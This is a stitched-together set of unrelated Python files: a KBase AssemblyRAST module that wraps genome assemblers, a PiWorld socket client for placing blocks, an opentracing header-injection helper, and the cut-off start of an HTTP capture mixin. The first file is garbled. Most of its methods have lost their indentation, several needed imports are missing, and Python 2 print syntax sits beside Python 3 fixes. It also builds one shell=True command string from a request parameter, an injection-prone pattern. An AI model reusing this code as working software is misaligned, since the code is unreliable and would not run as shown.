from AssemblyUtil.AssemblyUtilClient import AssemblyUtil
from pprint import pprint, pformat
# Bug fix: ``from collections import Iterable`` fails on Python >= 3.10;
# the ABC lives in collections.abc (fallback kept for old interpreters).
try:
    from collections.abc import Iterable
except ImportError:
    from collections import Iterable
import numpy as np
from Bio import SeqIO
from biokbase.workspace.client import Workspace as workspaceService
# logging.basicConfig(format="[%(asctime)s %(levelname)s %(name)s] %(message)s", level=logging.DEBUG)
logger = logging.getLogger(__name__)
#END_HEADER
class AssemblyRAST:
'''
Module Name:
AssemblyRAST
Module Description:
A KBase module: AssemblyRAST
This modules run assemblers supported in the AssemblyRAST service.
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.4"
GIT_URL = "git@github.com:scanon/ARAST_SDK.git"
GIT_COMMIT_HASH = "9212af592b71ee2df38562378489b0dedee0bf1a"
#BEGIN_CLASS_HEADER
workspaceURL = None
# target is a list for collecting log messages
    def log(self, target, message):
        """Append *message* to the *target* list (when given) and echo it to stdout."""
        # we should do something better here...
        if target is not None:
            target.append(message)
        print(message)
        # Flush so log lines appear immediately in the job's captured output.
        sys.stdout.flush()
def create_temp_json(self, attrs):
f = tempfile.NamedTemporaryFile(delete=False)
outjson = f.name
f.write(json.dumps(attrs))
f.close()
return outjson
# combine multiple read library objects into a kbase_assembly_input
    def combine_read_libs(self, libs):
        """Merge workspace read-library objects into one kbase_assembly_input dict.

        :param libs: list of workspace objects (each with 'data' and 'info')
            of type PairedEndLibrary or SingleEndLibrary.
        :returns: dict with 'paired_end_libs', 'single_end_libs' and
            'references' lists in the shape the AssemblyRAST service expects.
        """
        pe_libs = []
        se_libs = []
        # NOTE(review): refs is never populated here; 'references' is always
        # emitted empty — confirm whether reference support was intended.
        refs = []
        for libobj in libs:
            data = libobj['data']
            info = libobj['info']
            #print(json.dumps(data))
            #print(json.dumps(info))
            # info[2] looks like "Module.TypeName-x.y"; extract TypeName.
            type_name = info[2].split('.')[1].split('-')[0]
            lib = dict()
            if type_name == 'PairedEndLibrary':
                # Old-style objects store files under lib1/lib2; newer ones
                # under handle_1/handle_2.  Default file names are supplied
                # when missing so downstream tools have something to write.
                if 'lib1' in data:
                    lib['handle_1'] = data['lib1']['file']
                    if 'file_name' not in lib['handle_1']:
                        lib['handle_1']['file_name']='lib1.fq'
                elif 'handle_1' in data:
                    lib['handle_1'] = data['handle_1']
                    if 'file_name' not in lib['handle_1']:
                        lib['handle_1']['file_name']='lib1.fq'
                if 'lib2' in data:
                    lib['handle_2'] = data['lib2']['file']
                    if 'file_name' not in lib['handle_2']:
                        lib['handle_2']['file_name']='lib2.fq'
                elif 'handle_2' in data:
                    lib['handle_2'] = data['handle_2']
                    if 'file_name' not in lib['handle_2']:
                        lib['handle_2']['file_name']='lib2.fq'
                if 'interleaved' in data:
                    lib['interleaved'] = data['interleaved']
                    # Only dict-like handles can carry a file_name.
                    if isinstance(lib['interleaved'], Iterable) and 'file_name' not in lib['interleaved']:
                        lib['interleaved']['file_name']='reads.fq'
                pe_libs.append(lib)
            elif type_name == 'SingleEndLibrary':
                if 'lib' in data:
                    lib['handle'] = data['lib']['file']
                elif 'handle' in data:
                    lib['handle'] = data['handle']
                if 'file_name' not in lib['handle']:
                    lib['handle']['file_name']='reads.fq'
                se_libs.append(lib)
        assembly_input = { 'paired_end_libs': pe_libs,
                           'single_end_libs': se_libs,
                           'references': refs }
        logger.debug('kbase_assembly_input = {}'.format(json.dumps(assembly_input)))
        return assembly_input
# template
def arast_run(self, ctx, params, assembler, server='http://localhost:8000'):
output = None
console = []
self.log(console,'Running run_{} with params='.format(assembler))
self.log(console, pformat(params))
#### do some basic checks
if 'workspace_name' not in params:
raise ValueError('workspace_name parameter is required')
if 'read_library_refs' not in params and 'read_library_names' not in params:
raise ValueError('read_library_refs or read_library_names parameter is required')
if 'read_library_refs' in params:
if type(params['read_library_refs']) != list:
raise ValueError('read_library_refs must be a list')
if 'read_library_names' in params:
if type(params['read_library_names']) != list:
raise ValueError('read_library_names must be a list')
if 'output_contigset_name' not in params:
raise ValueError('output_contigset_name parameter is required')
min_contig_len = params.get('min_contig_len') or 300
token = ctx['token']
os.environ["KB_AUTH_TOKEN"] = token
os.environ["ARAST_URL"] = server
ws = workspaceService(self.workspaceURL)
ws_libs = []
if 'read_library_refs' in params:
for lib_ref in params['read_library_refs']:
ws_libs.append({'ref': lib_ref})
if 'read_library_names' in params:
for lib_name in params['read_library_names']:
ws_libs.append({'ref': params['workspace_name'] + '/' + lib_name})
if len(ws_libs)==0:
raise ValueError('At least one read library must be provided in read_library_refs or read_library_names')
libs = ws.get_objects2({'objects': ws_libs})['data']
wsid = libs[0]['info'][6]
kbase_assembly_input = self.combine_read_libs(libs)
tmp_data = self.create_temp_json(kbase_assembly_input)
mode = ''
cmd = ['ar-run', '--data-json', tmp_data]
if assembler:
cmd = cmd + ['-a', assembler]
mode = 'assembler: ' + assembler
elif 'pipeline' in params and params['pipeline']:
cmd = cmd + ['-p', params['pipeline']]
mode = 'assembly pipeline: ' + params['pipeline']
else:
cmd = cmd + ['-r', params.get('recipe', 'auto')]
mode = 'assembly recipe: ' + params['recipe']
logger.info('Start {}'.format(mode))
logger.debug('CMD: {}'.format(' '.join(cmd)))
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=False)
out, err = p.communicate()
logger.debug(out)
if p.returncode != 0:
raise ValueError('Error running ar_run, return code: {}\n'.format(p.returncode))
job_id = None
match = re.search('(\d+)', out)
if match:
job_id = match.group(1)
else:
raise ValueError('No integer job ID found: {}\n'.format(out))
timestamp = int((datetime.utcnow() - datetime.utcfromtimestamp(0)).total_seconds()*1000)
output_dir = os.path.join(self.scratch, 'output.'+str(timestamp))
output_contigs = os.path.join(output_dir, 'contigs.fa')
if not os.path.exists(output_dir):
os.makedirs(output_dir)
cmd = ['ar-get', '-j', job_id, '-w', '-l']
logger.debug('CMD: {}'.format(' '.join(cmd)))
ar_log = subprocess.check_output(cmd)
self.log(console, ar_log)
cmdstr = 'ar-get -j {} -w -p | ar-filter -l {} > {}'.format(job_id, min_contig_len, output_contigs)
logger.debug('CMD: {}'.format(cmdstr))
subprocess.check_call(cmdstr, shell=True)
cmd = ['ar-get', '-j', job_id, '-w', '-r']
logger.debug('CMD: {}'.format(' '.join(cmd)))
ar_report = subprocess.check_output(cmd)
self.log(console, "\nDONE\n")
client = AssemblyUtil(self.callback_url)
assembly_ref = client.save_assembly_from_fasta({
'file':{'path':output_contigs},
'workspace_name':params['workspace_name'],
'assembly_name':params['output_contigset_name']
})
lengths = []
for seq_record in SeqIO.parse(output_contigs, 'fasta'):
lengths.append(len(seq_record.seq))
provenance = [{}]
if 'provenance' in ctx:
provenance = ctx['provenance']
# add additional info to provenance here, in this case the input data object reference
if 'read_library_names' in params:
provenance[0]['input_ws_objects']=[params['workspace_name']+'/'+x for x in params['read_library_names']]
elif 'read_library_refs' in params:
provenance[0]['input_ws_objects']=[x for x in params['read_library_refs']]
os.remove(tmp_data)
#shutil.rmtree(output_dir)
# create a Report
report = ''
report += '============= Raw Contigs ============\n' + ar_report + '\n'
report += '========== Filtered Contigs ==========\n'
report += 'ContigSet saved to: '+params['workspace_name']+'/'+params['output_contigset_name']+'\n'
report += 'Assembled into '+str(len(lengths)) + ' contigs.\n'
report += 'Average Length: '+str(sum(lengths)/float(len(lengths))) + ' bp.\n'
# compute a simple contig length distribution
bins = 10
counts, edges = np.histogram(lengths, bins)
report += 'Contig Length Distribution (# of contigs -- min to max basepairs):\n'
for c in range(bins):
report += ' '+str(counts[c]) + '\t--\t' + str(edges[c]) + ' to ' + str(edges[c+1]) + ' bp\n'
print report
reportObj = {
'objects_created':[{'ref':params['workspace_name']+'/'+params['output_contigset_name'], 'description':'Assembled contigs'}],
'text_message': report
}
reportName = '{}.report.{}'.format(assembler, job_id)
report_obj_info = ws.save_objects({
'id': wsid,
'objects': [
{
'type': 'KBaseReport.Report',
'data': reportObj,
'name': reportName,
'meta': {},
'hidden': 1,
'provenance': provenance
}
]
})[0]
output = { 'report_name': reportName, 'report_ref': str(report_obj_info[6]) + '/' + str(report_obj_info[0]) + '/' + str(report_obj_info[4]) }
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method filter_contigs return value ' +
'returnVal is not type dict as required.')
# return the results
return output
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
    def __init__(self, config):
        """Initialise the implementation from the deploy configuration.

        :param config: dict-like deploy config; must provide
            'workspace-url' and 'scratch'.  The SDK_CALLBACK_URL
            environment variable must also be set (KeyError otherwise).
        """
        #BEGIN_CONSTRUCTOR
        self.workspaceURL = config['workspace-url']
        # scratch is the job-local working directory; created on demand.
        self.scratch = os.path.abspath(config['scratch'])
        self.callback_url = os.environ['SDK_CALLBACK_URL']
        if not os.path.exists(self.scratch):
            os.makedirs(self.scratch)
        #END_CONSTRUCTOR
        pass
def run_kiki(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_kiki
output = self.arast_run(ctx, params, "kiki")
#END run_kiki
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_kiki return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_velvet(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_velvet
output = self.arast_run(ctx, params, "velvet")
#END run_velvet
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_velvet return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_miniasm(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_miniasm
output = self.arast_run(ctx, params, "miniasm")
#END run_miniasm
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_miniasm return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_spades(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_spades
output = self.arast_run(ctx, params, "spades")
#END run_spades
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_spades return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_idba(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_idba
output = self.arast_run(ctx, params, "idba")
#END run_idba
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_idba return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_megahit(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_megahit
output = self.arast_run(ctx, params, "megahit")
#END run_megahit
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_megahit return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_ray(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_ray
output = self.arast_run(ctx, params, "ray")
#END run_ray
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_ray return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_masurca(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_masurca
output = self.arast_run(ctx, params, "masurca")
#END run_masurca
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_masurca return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_a5(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_a5
output = self.arast_run(ctx, params, "a5")
#END run_a5
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_a5 return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_a6(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_a6
output = self.arast_run(ctx, params, "a6")
#END run_a6
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_a6 return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_arast(self, ctx, params):
"""
:param params: instance of type "ArastParams" (Call AssemblyRAST.
workspace_name - the name of the workspace for input/output
read_library_name - the name of the PE read library (SE library
support in the future) output_contig_set_name - the name of the
output contigset extra_params - assembler specific parameters
min_contig_length - minimum length of contigs to output, default
200 @optional recipe @optional assembler @optional pipeline
@optional min_contig_len) -> structure: parameter "workspace_name"
of String, parameter "read_library_names" of list of String,
parameter "read_library_refs" of list of String, parameter
"output_contigset_name" of String, parameter "recipe" of String,
parameter "assembler" of String, parameter "pipeline" of String,
parameter "min_contig_len" of Long
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_arast
output = self.arast_run(ctx, params, params.get('assembler', ""))
#END run_arast
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_arast return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
|
# This file allows you to programmatically create blocks in PiWorld.
# Please use this wisely. Test on your own server first. Do not abuse it.
import socket
import sys
import time
# Connection defaults for a locally hosted PiWorld server.
DEFAULT_HOST = '127.0.0.1'
DEFAULT_PORT = 4080
# Block (tile) type ids understood by the server's 'B' command.
EMPTY = 0
GRASS = 1
SAND = 2
STONE = 3
BRICK = 4
WOOD = 5
CEMENT = 6
DIRT = 7
PLANK = 8
SNOW = 9
GLASS = 10
COBBLE = 11
LIGHT_STONE = 12
DARK_STONE = 13
CHEST = 14
LEAVES = 15
CLOUD = 16
TALL_GRASS = 17
YELLOW_FLOWER = 18
RED_FLOWER = 19
PURPLE_FLOWER = 20
SUN_FLOWER = 21
WHITE_FLOWER = 22
BLUE_FLOWER = 23
# NOTE(review): ids 24-42 are skipped; presumably other colour blocks
# exist server-side -- confirm against the PiWorld block table.
COLOR_11 = 43
# Offsets from a cell centre to its eight corners; used by sphere() to
# decide whether a cell straddles the sphere surface.
OFFSETS = [
    (-0.5, -0.5, -0.5),
    (-0.5, -0.5, 0.5),
    (-0.5, 0.5, -0.5),
    (-0.5, 0.5, 0.5),
    (0.5, -0.5, -0.5),
    (0.5, -0.5, 0.5),
    (0.5, 0.5, -0.5),
    (0.5, 0.5, 0.5),
]
def sphere(cx, cy, cz, r, fill=False, fx=False, fy=False, fz=False):
    """Integer cells approximating a sphere of radius r about (cx, cy, cz).

    A cell is kept when its eight corners straddle the surface: at least
    one corner strictly inside the radius and at least one at or beyond
    it.  With fill=True every cell counts as already "outside", so the
    whole interior is kept.  fx/fy/fz pin the corresponding axis to the
    centre plane, reducing the result to a circle on that plane.
    """
    cells = set()
    for x in range(cx - r, cx + r + 1):
        if fx and x != cx:
            continue
        for y in range(cy - r, cy + r + 1):
            if fy and y != cy:
                continue
            for z in range(cz - r, cz + r + 1):
                if fz and z != cz:
                    continue
                dists = [((x + dx - cx) ** 2 +
                          (y + dy - cy) ** 2 +
                          (z + dz - cz) ** 2) ** 0.5
                         for dx, dy, dz in OFFSETS]
                straddles = any(d < r for d in dists) and (fill or any(d >= r for d in dists))
                if straddles:
                    cells.add((x, y, z))
    return cells
def circle_x(x, y, z, r, fill=False):
    """Circle (sphere slice) in the plane of constant x."""
    return sphere(x, y, z, r, fill, fx=True)
def circle_y(x, y, z, r, fill=False):
    """Circle (sphere slice) in the plane of constant y."""
    return sphere(x, y, z, r, fill, fy=True)
def circle_z(x, y, z, r, fill=False):
    """Circle (sphere slice) in the plane of constant z."""
    return sphere(x, y, z, r, fill, fz=True)
def cylinder_x(x1, x2, y, z, r, fill=False):
    """Cells of an x-aligned cylinder spanning x1..x2 (inclusive)."""
    lo, hi = sorted((x1, x2))
    slices = [circle_x(x, y, z, r, fill) for x in range(lo, hi + 1)]
    return set().union(*slices)
def cylinder_y(x, y1, y2, z, r, fill=False):
    """Cells of a y-aligned cylinder spanning y1..y2 (inclusive)."""
    lo, hi = sorted((y1, y2))
    slices = [circle_y(x, y, z, r, fill) for y in range(lo, hi + 1)]
    return set().union(*slices)
def cylinder_z(x, y, z1, z2, r, fill=False):
    """Cells of a z-aligned cylinder spanning z1..z2 (inclusive)."""
    lo, hi = sorted((z1, z2))
    slices = [circle_z(x, y, z, r, fill) for z in range(lo, hi + 1)]
    return set().union(*slices)
def cuboid(x1, x2, y1, y2, z1, z2, fill=True):
    """Cells of an axis-aligned box; only the shell when fill=False.

    flat_axes counts degenerate (zero-extent) axes so that a flat face,
    line or single point still requires strictly more boundary hits than
    its own flatness provides before a cell counts as shell.
    """
    x1, x2 = sorted((x1, x2))
    y1, y2 = sorted((y1, y2))
    z1, z2 = sorted((z1, z2))
    flat_axes = (x1 == x2) + (y1 == y2) + (z1 == z2)
    def boundary_hits(x, y, z):
        return (x in (x1, x2)) + (y in (y1, y2)) + (z in (z1, z2))
    return {(x, y, z)
            for x in range(x1, x2 + 1)
            for y in range(y1, y2 + 1)
            for z in range(z1, z2 + 1)
            if fill or boundary_hits(x, y, z) > flat_axes}
def pyramid(x1, x2, y, z1, z2, fill=False):
    """Cells of a stepped pyramid whose base spans x1..x2 by z1..z2 at
    height y, shrinking by one cell per side on each layer upward.

    :param fill: passed through to cuboid() for each layer (hollow
        layers when False).
    :returns: set of (x, y, z) cells.
    """
    x1, x2 = sorted((x1, x2))
    z1, z2 = sorted((z1, z2))
    result = set()
    # BUG FIX: the loop previously tested "z2 >= z2" (always true), so a
    # non-square base kept adding layers after the z extent was used up
    # (cuboid's internal sort re-expanded the crossed z bounds).
    while x2 >= x1 and z2 >= z1:
        result |= cuboid(x1, x2, y, y, z1, z2, fill)
        y, x1, x2, z1, z2 = y + 1, x1 + 1, x2 - 1, z1 + 1, z2 - 1
    return result
class Client(object):
    """Minimal client for the PiWorld block-placement TCP protocol.

    The wire format is one ASCII line per block: ``B,x,y,z,w\\n``.
    """
    def __init__(self, host, port):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.conn.connect((host, port))
    def set_block(self, x, y, z, w):
        """Place a block of type *w* at integer position (x, y, z)."""
        # Encode to bytes: socket.sendall() rejects str under Python 3.
        self.conn.sendall(('B,%d,%d,%d,%d\n' % (x, y, z, w)).encode('ascii'))
        time.sleep(0.004) # pause long enough for a pi0 server to update
    def set_blocks(self, blocks, w):
        """Place every (x, y, z) in *blocks* as type *w*, ordered by
        (y, x, z) so structures build bottom-up."""
        key = lambda block: (block[1], block[0], block[2])
        for x, y, z in sorted(blocks, key=key):
            self.set_block(x, y, z, w)
    def bitmap(self, sx, sy, sz, d1, d2, data, lookup):
        """Paint rows of characters as blocks starting at (sx, sy, sz).

        d1 is the per-character step and d2 the per-row step (each a
        (dx, dy, dz) triple).  Characters present in *lookup* map to a
        block id; others leave the cell untouched.
        """
        x, y, z = sx, sy, sz
        dx1, dy1, dz1 = d1
        dx2, dy2, dz2 = d2
        for row in data:
            # Rewind the axis driven by d1 at the start of each row.
            x = sx if dx1 else x
            y = sy if dy1 else y
            z = sz if dz1 else z
            for c in row:
                w = lookup.get(c)
                if w is not None:
                    self.set_block(x, y, z, w)
                x, y, z = x + dx1, y + dy1, z + dz1
            x, y, z = x + dx2, y + dy2, z + dz2
def get_client():
    """Create a Client, honouring optional ``host`` and ``port``
    command-line arguments and falling back to the defaults for any
    missing (or empty) value."""
    supplied = sys.argv[1:3] + [None, None]
    host = supplied[0] or DEFAULT_HOST
    port = supplied[1] or DEFAULT_PORT
    return Client(host, int(port))
def main():
    """Connect to the server and run whichever build snippets are
    enabled below.

    The commented lines are kept as a cookbook of shapes (discs, walls,
    spheres, pillars, pyramids, bitmap text) to paste back in as needed.
    """
    client = get_client()
    # Local aliases used by the example snippets.
    set_block = client.set_block
    set_blocks = client.set_blocks
    # set_blocks(circle_y(0, 32, 0, 16, True), STONE)
    # set_blocks(circle_y(0, 33, 0, 16), BRICK)
    # set_blocks(cuboid(-1, 1, 1, 31, -1, 1), CEMENT)
    # set_blocks(cuboid(-1024, 1024, 32, 32, -3, 3), STONE)
    # set_blocks(cuboid(-3, 3, 32, 32, -1024, 1024), STONE)
    # set_blocks(cuboid(-1024, 1024, 33, 33, -3, -3), BRICK)
    # set_blocks(cuboid(-1024, 1024, 33, 33, 3, 3), BRICK)
    # set_blocks(cuboid(-3, -3, 33, 33, -1024, 1024), BRICK)
    # set_blocks(cuboid(3, 3, 33, 33, -1024, 1024), BRICK)
    # set_blocks(sphere(0, 32, 0, 16), GLASS)
    # for y in range(1, 32):
    #     set_blocks(circle_y(0, y, 0, 4, True), CEMENT)
    # set_blocks(circle_x(16, 33, 0, 3), BRICK)
    # set_blocks(circle_x(-16, 33, 0, 3), BRICK)
    # set_blocks(circle_z(0, 33, 16, 3), BRICK)
    # set_blocks(circle_z(0, 33, -16, 3), BRICK)
    # for x in range(0, 1024, 32):
    #     set_blocks(cuboid(x - 1, x + 1, 31, 32, -1, 1), CEMENT)
    #     set_blocks(cuboid(-x - 1, -x + 1, 31, 32, -1, 1), CEMENT)
    #     set_blocks(cuboid(x, x, 1, 32, -1, 1), CEMENT)
    #     set_blocks(cuboid(-x, -x, 1, 32, -1, 1), CEMENT)
    # for z in range(0, 1024, 32):
    #     set_blocks(cuboid(-1, 1, 31, 32, z - 1, z + 1), CEMENT)
    #     set_blocks(cuboid(-1, 1, 31, 32, -z - 1, -z + 1), CEMENT)
    #     set_blocks(cuboid(-1, 1, 1, 32, z, z), CEMENT)
    #     set_blocks(cuboid(-1, 1, 1, 32, -z, -z), CEMENT)
    # for x in range(0, 1024, 8):
    #     set_block(x, 32, 0, CEMENT)
    #     set_block(-x, 32, 0, CEMENT)
    # for z in range(0, 1024, 8):
    #     set_block(0, 32, z, CEMENT)
    #     set_block(0, 32, -z, CEMENT)
    # set_blocks(pyramid(32, 32+64-1, 12, 32, 32+64-1), COBBLE)
    # outer = circle_y(0, 32, 0, 176 + 3, True)
    # inner = circle_y(0, 32, 0, 176 - 3, True)
    # set_blocks(outer - inner, STONE)
    # a = sphere(-32, 48, -32, 24, True)
    # b = sphere(-24, 40, -24, 24, True)
    # set_blocks(a - b, PLANK)
    # set_blocks(cylinder_x(-64, 64, 32, 0, 8), STONE)
    # data = [
    #     '.......................................',
    #     '..rrr..r..x...x..xxx..xxxx..x....xxxx..',
    #     '.r...r.r..x...x.x...x.x...x.x....x...x.',
    #     '.rrrr..r..x.x.x.x...x.xxxx..x....x...x.',
    #     '.r.....r..x.x.x.x...x.x..x..x....x...x.',
    #     '.r.....r...xxx...xxx..x...x.xxxx.xxxx..',
    #     '.......................................',
    # ]
    # lookup = {
    #     'r': COLOR_11,
    #     'x': STONE,
    #     '.': PLANK,
    # }
    # client.bitmap(2, 32, 32, (1, 0, 0), (0, -1, 0), data, lookup)
if __name__ == '__main__':
    main()
|
"""
Tracing Context Injection.
@author: Hao Song (songhao@vmware.com)
"""
import opentracing
# pylint: disable=protected-access
def inject_as_headers(tracer, span, request):
    """Inject the span's tracing context into *request* as HTTP headers.

    The context is serialized through the TEXT_MAP propagation format
    into a dict carrier, then each key/value pair is added as a header.

    :param tracer: wrapper whose underlying OpenTracing tracer is held
        in its (private) _tracer attribute.
    :param span: the active span whose context is propagated.
    :param request: object exposing add_header(key, value).
    """
    carrier = {}
    tracer._tracer.inject(span.context, opentracing.Format.TEXT_MAP,
                          carrier)
    for header_name, header_value in carrier.items():
        request.add_header(header_name, header_value)
|
import logging
import re
import socket
from http.client import HTTPMessage
from .proxy2 import ProxyRequestHandler
from .request import Request, Response
from .utils import is_list_alike
log = logging.getLogger(__name__)
class CaptureMixin:
    """Mixin that handles the capturing of requests and responses."""
